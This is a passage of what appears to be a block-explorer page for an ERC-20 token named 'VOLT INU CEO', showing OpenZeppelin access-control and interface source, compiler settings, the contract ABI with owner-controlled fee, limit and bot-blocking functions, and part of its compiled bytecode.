 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newCount","type":"uint256"}],"name":"CountUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_buyMap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV3Router","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"bot","type":"address"}],"name":"blockBots","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"bots","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"bridge","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"count","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"incrementCount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialTotalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingOpen","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelay","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"notbot","type":"address"}],"name":"unblockBot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a060405260006007557368b3465833fb72a70ecdf485e0e4c7bd8665fc45600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073c55e38152c2771a50936d252aa9b48a9dd0b5b62600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555069d3c21bcecceda1000000600c5569043c33c1937564800000600d5569043c33c1937564800000600e5569021e19e0c9bab2400000600f556001601060006101000a81548160ff0219169083151502179055506000601060016101000a81548160ff0219169083151502179055506000601060026101000a81548160ff02191690831515021790555060076011556007601255600f601355601e6014556005601555600f601655600a6017553480156200016c57600080fd5b506040518060400160405280600c81526020017f564f4c5420494e552043454f00000000000000000000000000000000000000008152506040518060400160405280600781526020017f564f4c5443454f000000000000000000000000000000000000000000000000008152508160039081620001ea919062000cee565b508060049081620001fc919062000cee565b5050506200021f62000213620005ad60201b60201c565b620005b560201b60201c565b737a250d5630b4cf539739df2c5dacb4c659f2488d600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620002a9600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200067b60201b60201c565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000317573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200033d919062000e3f565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620003c7573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003ed919062000e3f565b6040518363ffffffff1660e01b81526004016200040c92919062000e82565b6020604051808303816000875af11580156200042c573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000452919062000e3f565b73ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250506200049a60805160016200067b60201b60201c565b620004af6080516001620006e660201b60201c565b620004bf620005ad60201b60201c565b600b60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000521620005136200078760201b60201c565b6001620007b160201b60201c565b62000534306001620007b160201b60201c565b6200054961dead6001620007b160201b60201c565b6200056b6200055d6200078760201b60201c565b60016200067b60201b60201c565b6200057e3060016200067b60201b60201c565b6200059361dead60016200067b60201b60201c565b620005a733600c546200086c60201b60201c565b62001076565b600033905090565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6200068b620009d960201b60201c565b80601a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b620007c1620009d960201b60201c565b80601960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405162000860919062000ecc565b60405180910390a25050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620008de576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620008d59062000f4a565b60405180910390fd5b620008f26000838362000a6a60201b60201c565b806002600082825462000906919062000f9b565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620009b9919062000fe7565b60405180910390a3620009d56000838362000a6f60201b60201c565b5050565b620009e9620005ad60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1662000a0f6200078760201b60201c565b73ffffffffffffffffffffffffffffffffffffffff161462000a68576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000a5f9062001054565b60405180910390fd5b565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000af657607f821691505b60208210810362000b0c5762000b0b62000aae565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830262000b767fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000b37565b62000b82868362000b37565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000bcf62000bc962000bc38462000b9a565b62000ba4565b62000b9a565b9050919050565b6000819050919050565b62000beb8362000bae565b62000c0362000bfa8262000bd6565b84845462000b44565b825550505050565b600090565b62000c1a62000c0b565b62000c2781848462000be0565b505050565b5b8181101562000c4f5762000c4360008262000c10565b60018101905062000c2d565b5050565b601f82111562000c9e5762000c688162000b12565b62000c738462000b27565b8101602085101562000c83578190505b62000c9b62000c928562000b27565b83018262000c2c565b50505b505050565b600082821c905092915050565b600062000cc36000198460080262000ca3565b1980831691505092915050565b600062000cde838362000cb0565b9150826002028217905092915050565b62000cf98262000a74565b67ffffffffffffffff81111562000d155762000d1462000a7f565b5b62000d21825462000add565b62000d2e82828562000c53565b600060209050601f83116001811462000d66576000841562000d51578287015190505b62000d5d858262000cd0565b86555062000dcd565b601f19841662000d768662000b12565b60005b8281101562000da05784890151825560018201915060208501945060208101905062000d79565b8683101562000dc0578489015162000dbc601f89168262000cb0565b8355505b6001600288020188555050505b505050505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000e078262000dda565b9050919050565b62000e198162000dfa565b811462000e2557600080fd5b50565b60008151905062000e398162000e0e565b92915050565b60006020828403121562000e585762000e5762000dd5565b5b600062000e688482850162000e28565b91505092915050565b62000e7c8162000dfa565b82525050565b600060408201905062000e99600083018562000e71565b62000ea8602083018462000e71565b9392505050565b60008115159050919050565b62000ec68162000eaf565b82525050565b600060208201905062000ee3600083018462000ebb565b92915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000f32601f8362000ee9565b915062000f3f8262000efa565b602082019050919050565b6000602082019050818103600083015262000f658162000f23565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000fa88262000b9a565b915062000fb58362000b9a565b925082820190508082111562000fd05762000fcf62000f6c565b5b92915050565b62000fe18162000b9a565b82525050565b600060208201905062000ffe600083018462000fd6565b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006200103c60208362000ee9565b9150620010498262001004565b602082019050919050565b600060208201905081810360008301526200106f816200102d565b9050919050565b608051613f85620010a060003960008181610b1201528181610e8c01526111ef0152613f856000f3fe60806040526004361061024a5760003560e01c8063751039fc11610139578063c0246668116100b6578063e2f456051161007a578063e2f45605146108a5578063e5071b8e146108d0578063e78cea92146108e7578063f2fde38b14610912578063f8b45b051461093b578063ffb54a991461096657610251565b8063c0246668146107d2578063c8c8ebe4146107fb578063c9567bf914610826578063ca7030751461083d578063dd62ed3e1461086857610251565b806395d89b41116100fd57806395d89b41146106c75780639a7a23d6146106f2578063a457c2d71461071b578063a9059cbb14610758578063bfd792841461079557610251565b8063751039fc146105f45780637571336a1461060b57806375f0a874146106345780637f2feddc1461065f5780638da5cb5b1461069c57610251565b806339509351116101c757806363c6f9121161018b57806363c6f912146105235780636b9990531461054c5780636ddd17131461057557806370a08231146105a0578063715018a6146105dd57610251565b806339509351146104285780634320bcf11461046557806349bd5a5e146104905780634fbee193146104bb578063583e0568146104f857610251565b80631f3fed8f1161020e5780631f3fed8f1461033f57806323b872dd1461036a57806327c8f835146103a7578063311028af146103d2578063313ce567146103fd57610251565b806306661abd1461025657806306fdde0314610281578063095ea7b3146102ac5780630a702e8d146102e957806318160ddd1461031457610251565b3661025157005b600080fd5b34801561026257600080fd5b5061026b610991565b6040516102789190612cee565b60405180910390f35b34801561028d57600080fd5b50610296610997565b6040516102a39190612d99565b60405180910390f35b3480156102b857600080fd5b506102d360048036038101906102ce9190612e4a565b610a29565b6040516102e09190612ea5565b60405180910390f35b3480156102f557600080fd5b506102fe610a4c565b60405161030b9190612ea5565b60405180910390f35b34801561032057600080fd5b50610329610a5f565b6040516103369190612cee565b60405180910390f35b34801561034b57600080fd5b50610354610a69565b6040516103619190612cee565b60405180910390f35b34801561037657600080fd5b50610391600480360381019061038c9190612ec0565b610a6f565b60405161039e9190612ea5565b60405180910390f35b3480156103b357600080fd5b506103bc610a9e565b6040516103c99190612f22565b60405180910390f35b3480156103de57600080fd5b506103e7610aa4565b6040516103f49190612cee565b60405180910390f35b34801561040957600080fd5b50610412610aaa565b60405161041f9190612f59565b60405180910390f35b34801561043457600080fd5b5061044f600480360381019061044a9190612e4a565b610ab3565b60405161045c9190612ea5565b60405180910390f35b34801561047157600080fd5b5061047a610aea565b6040516104879190612f22565b60405180910390f35b34801561049c57600080fd5b506104a5610b10565b6040516104b29190612f22565b60405180910390f35b3480156104c757600080fd5b506104e260048036038101906104dd9190612f74565b610b34565b6040516104ef9190612ea5565b60405180910390f35b34801561050457600080fd5b5061050d610b8a565b60405161051a9190613000565b60405180910390f35b34801561052f57600080fd5b5061054a60048036038101906105459190612f74565b610bb0565b005b34801561055857600080fd5b50610573600480360381019061056e9190612f74565b610c13565b005b34801561058157600080fd5b5061058a610c76565b6040516105979190612ea5565b60405180910390f35b3480156105ac57600080fd5b506105c760048036038101906105c29190612f74565b610c89565b6040516105d49190612cee565b60405180910390f35b3480156105e957600080fd5b506105f2610cd1565b005b34801561060057600080fd5b50610609610ce5565b005b34801561061757600080fd5b50610632600480360381019061062d9190613047565b610d25565b005b34801561064057600080fd5b50610649610d88565b6040516106569190612f22565b60405180910390f35b34801561066b57600080fd5b5061068660048036038101906106819190612f74565b610dae565b6040516106939190612cee565b60405180910390f35b3480156106a857600080fd5b506106b1610dc6565b6040516106be9190612f22565b60405180910390f35b3480156106d357600080fd5b506106dc610df0565b6040516106e99190612d99565b60405180910390f35b3480156106fe57600080fd5b5061071960048036038101906107149190613047565b610e82565b005b34801561072757600080fd5b50610742600480360381019061073d9190612e4a565b610f26565b60405161074f9190612ea5565b60405180910390f35b34801561076457600080fd5b5061077f600480360381019061077a9190612e4a565b610f9d565b60405161078c9190612ea5565b60405180910390f35b3480156107a157600080fd5b506107bc60048036038101906107b79190612f74565b610fc0565b6040516107c99190612ea5565b60405180910390f35b3480156107de57600080fd5b506107f960048036038101906107f49190613047565b610fe0565b005b34801561080757600080fd5b50610810611091565b60405161081d9190612cee565b60405180910390f35b34801561083257600080fd5b5061083b611097565b005b34801561084957600080fd5b50610852611306565b60405161085f9190612cee565b60405180910390f35b34801561087457600080fd5b5061088f600480360381019061088a9190613087565b61130c565b60405161089c9190612cee565b60405180910390f35b3480156108b157600080fd5b506108ba611393565b6040516108c79190612cee565b60405180910390f35b3480156108dc57600080fd5b506108e5611399565b005b3480156108f357600080fd5b506108fc6113ee565b6040516109099190612f22565b60405180910390f35b34801561091e57600080fd5b5061093960048036038101906109349190612f74565b611414565b005b34801561094757600080fd5b50610950611497565b60405161095d9190612cee565b60405180910390f35b34801561097257600080fd5b5061097b61149d565b6040516109889190612ea5565b60405180910390f35b60065481565b6060600380546109a6906130f6565b80601f01602080910402602001604051908101604052809291908181526020018280546109d2906130f6565b8015610a1f5780601f106109f457610100808354040283529160200191610a1f565b820191906000526020600020905b815481529060010190602001808311610a0257829003601f168201915b5050505050905090565b600080610a346114b0565b9050610a418185856114b8565b600191505092915050565b601060009054906101000a900460ff1681565b6000600254905090565b60185481565b600080610a7a6114b0565b9050610a87858285611681565b610a9285858561170d565b60019150509392505050565b61dead81565b600c5481565b60006012905090565b600080610abe6114b0565b9050610adf818585610ad0858961130c565b610ada9190613156565b6114b8565b600191505092915050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000601960008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b610bb8612375565b6001601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b610c1b612375565b6000601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b601060029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610cd9612375565b610ce360006123f3565b565b610ced612375565b6000610cf7610a5f565b905080600d8190555080600e819055506000601060006101000a81548160ff02191690831515021790555050565b610d2d612375565b80601a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b601e6020528060005260406000206000915090505481565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610dff906130f6565b80601f0160208091040260200160405190810160405280929190818152602001828054610e2b906130f6565b8015610e785780601f10610e4d57610100808354040283529160200191610e78565b820191906000526020600020905b815481529060010190602001808311610e5b57829003601f168201915b5050505050905090565b610e8a612375565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0f906131fc565b60405180910390fd5b610f2282826124b9565b5050565b600080610f316114b0565b90506000610f3f828661130c565b905083811015610f84576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f7b9061328e565b60405180910390fd5b610f9182868684036114b8565b60019250505092915050565b600080610fa86114b0565b9050610fb581858561170d565b600191505092915050565b601d6020528060005260406000206000915054906101000a900460ff1681565b610fe8612375565b80601960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516110859190612ea5565b60405180910390a25050565b600d5481565b61109f612375565b601060019054906101000a900460ff16156110ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e6906132fa565b60405180910390fd5b61111e30600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600c546114b8565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719473061117a605561116c30610c89565b61255a90919063ffffffff16565b600080611185610dc6565b426040518863ffffffff1660e01b81526004016111a796959493929190613355565b60606040518083038185885af11580156111c5573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906111ea91906133cb565b5050507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b815260040161128a92919061341e565b6020604051808303816000875af11580156112a9573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906112cd919061345c565b506001601060026101000a81548160ff0219169083151502179055506001601060016101000a81548160ff021916908315150217905550565b60075481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600f5481565b6001600660008282546113ac9190613156565b925050819055507f06bef5f47a1a400f9ceb1f3700a329a4ced09a400f88dd3230d93e4c104c907f6006546040516113e49190612cee565b60405180910390a1565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b61141c612375565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361148b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611482906134fb565b60405180910390fd5b611494816123f3565b50565b600e5481565b601060019054906101000a900460ff1681565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611527576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161151e9061358d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611596576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161158d9061361f565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516116749190612cee565b60405180910390a3505050565b600061168d848461130c565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461170757818110156116f9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116f09061368b565b60405180910390fd5b61170684848484036114b8565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361177c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117739061371d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036117eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117e2906137af565b60405180910390fd5b60008103611804576117ff838360006125c0565b612370565b61180c610dc6565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415801561187a575061184a610dc6565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156118b35750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156118ed575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156119065750600b60149054906101000a900460ff16155b15611f8a57601060019054906101000a900460ff16611a0057601960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815